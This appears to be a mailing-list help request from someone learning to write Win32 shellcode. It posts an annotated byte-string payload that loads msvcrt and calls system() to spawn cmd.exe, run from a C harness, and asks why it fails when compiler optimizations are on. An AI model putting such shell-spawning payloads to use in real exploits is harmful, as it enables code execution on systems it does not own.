shellcode not executing if optimizations are on.

["wirepair" <wirepair () roguemail net>]

Ok so I'm still trying my hand at writing shellcode for 
win32.
My problem is my code executes fine as long as i compile 
with out optimizations, If i disable optimizations it 
executes fine and i get my cmd.exe shell. Could anyone 
throw me a fricken bone and tell me what I'm doing wrong? 
You can find my inline asm at (which this is based off 
of): http://sh0dan.org/files/llacmd.txt.
But if you're lazy like I am you'll probably just want to 
see this:

#include <stdio.h>

int main(int argc, char **argv) {
	char shellcizode[] = 
	"\x55"				// push ebp
        "\x8b\xec"                    // mov ebp, esp
        "\x53"                                // push ebx
        "\x56"                                // push esi
        "\x57"                                // push edi
        "\x8b\xe5"                    // mov esp, ebp                         
        "\x55"                                // push ebp
        "\x8b\xec"                    // mov ebp, esp
        "\x33\xff"                    // xor edi,edi
        "\x57"                                // push edi
        "\x57"                                // push edi
        "\xc6\x45\xf8\x6d"            // mov byte ptr ss:[ebp-8],6d
        "\xc6\x45\xf9\x73"            // mov byte ptr ss:[ebp-7],73
        "\xc6\x45\xfa\x76"            // mov byte ptr ss:[ebp-6],76
        "\xc6\x45\xfb\x63"            // mov byte ptr ss:[ebp-5],63
        "\xc6\x45\xfc\x72"            // mov byte ptr ss:[ebp-4],72
        "\xc6\x45\xfd\x74"            // mov byte ptr ss:[ebp-3],74
	"\xb8\xe8\xfe\xe9\x77" 		// mov 
eax,kernel32.loadlibraryA; 
	"\x50"				// push eax
        "\x8d\x45\xf8"                        // lea eax, dword ptr ss:[ebp-8]
        "\x50"                                // push eax
        "\xff\x55\xf4"                        // call dword ptr ss:[ebp-c]
        "\x58"                                // pop eax
        "\x58"                                // pop eax
        "\x58"                                // pop eax
        "\x33\xc0"                    // xor eax,eax
        "\x50"                                // push eax
        "\x50"                                // push eax
        "\xc6\x45\xf8\x63"            // mov byte ptr ss:[ebp-8],63
        "\xc6\x45\xf9\x6d"            // mov byte ptr ss:[ebp-7],6d
        "\xc6\x45\xfa\x64"            // mov byte ptr ss:[ebp-6],64
        "\xc6\x45\xfb\x2e"            // mov byte ptr ss:[ebp-5],2e
        "\xc6\x45\xfc\x65"            // mov byte ptr ss:[ebp-4],65
        "\xc6\x45\xfd\x78"            // mov byte ptr ss:[ebp-3],78
        "\xc6\x45\xfe\x65"            // mov byte ptr ss:[ebp-2],65
	"\xb8\xc3\xaf\x01\x78"		// mov eax, 7801AFC3; addy of 
system() from msvcrt
        "\x50"                                // push eax
        "\x8d\x45\xf8"                        // lea eax, dword ptr ss:[ebp-8]
        "\x50"                                // push eax
        "\xff\x55\xf4"                        // call dword ptr ss:[ebp-c]
        "\x83\xc4\x04"                        // add esp, 04h
        "\x5c"                                // pop esp
        "\xc3";                               // ret                  we're done!
        ((void (*)(void))&shellcizode)();

        return(0);
}
I'm sure the formatting got totally screwed but basically 
i'm calling loadlibrary a with msvcrt to be able to use 
the address of system() to execute cmd.exe. Now this only 
works IF optimizations are disabled. any hints??
Thanks,
-wire
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>